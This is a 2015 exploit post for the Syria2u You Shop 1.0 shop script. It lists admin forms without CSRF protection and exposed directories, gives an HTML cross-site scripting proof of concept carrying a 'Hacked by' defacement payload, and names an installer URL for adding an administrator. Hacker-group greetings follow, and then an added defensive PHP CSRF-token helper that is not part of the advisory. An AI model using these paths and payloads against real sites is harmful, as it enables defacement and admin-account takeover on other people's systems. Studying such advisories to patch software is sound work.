Syria2u You Shop 1.0 Cross Site Request Forgery / Cross Site Scripting
Posted on 07 June 2015
| # Title     : Syria2u You Shop v1.0 Multi Vulnerability
| # Author    : indoushka
| # email     : indoushka4ever@gmail.com
| # Dork      : سكربت يوشــوب للتسوق عبر الانترنت , قم باختيار المدينة ثم تمتع بالتسوق في مدينتك من أي مكان
| # Tested on : win8.1 Fr V.(Pro) 15:39 * 23/05/2015
| # Bug       : Multi
| # Download  : http://www.syria2u.com/
=======================================

HTML form without CSRF protection :

http://127.0.0.1/YouShop/Admin/system/addImage.php
http://127.0.0.1/YouShop/Admin/system/addVideo.php
http://127.0.0.1/YouShop/Admin/system/cckAddEdit.php

Directory listing :

http://127.0.0.1/YouShop/admin/editor/
http://127.0.0.1/YouShop/files/
http://127.0.0.1/YouShop/admin/cck/
http://127.0.0.1/YouShop/admin/system/

XSS - jQuery v1.8.0 Exploit :

<html>
<head>
<meta charset="utf-8">
<title>XSS - jQuery v1.8.0 </title>
<script src="http://127.0.0.1/YouShop/admin/js/jquery-1.8.0.min.js"></script>
<script>
$(function() {
    $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
    });
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee> reflected - jQuery v1.11.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com');</script></option>
</select>
</p>
</form>
</body>
</html>

Add Admin :

http://127.0.0.1/YouShop/install/index.php?install=3

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n *
========================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R
http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) *
www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------
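
One way to close the "HTML form without CSRF protection" finding, as an added example that is not part of the advisory or of the You Shop code base: a per-session token helper in PHP. The file name csrf.php, the field name csrf_token and the function names are assumptions, and PHP 7.3 or later is assumed for the SameSite cookie option.

```php
<?php
declare(strict_types=1);
// Added example, not You Shop code. Hypothetical helper file csrf.php,
// included first by addImage.php, addVideo.php and cckAddEdit.php.
// Assumes PHP 7.3+ (array form of session_set_cookie_params).

function csrf_start_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
        session_start();
    }
}

// One random token per session, created on first use.
function csrf_token(): string
{
    csrf_start_session();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to echo inside every <form method="post"> of the admin panel.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Call before any processing. GET/HEAD may only render; everything else
// must carry the session's token or the request ends with 403.
function csrf_guard(): void
{
    csrf_start_session();
    $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
    if ($method === 'GET' || $method === 'HEAD') {
        return;
    }
    $sent  = $_POST['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($known) || $known === ''
        || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}
```

The guard only helps if the handlers change state on POST alone; a script that also acts on query-string parameters stays forgeable.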
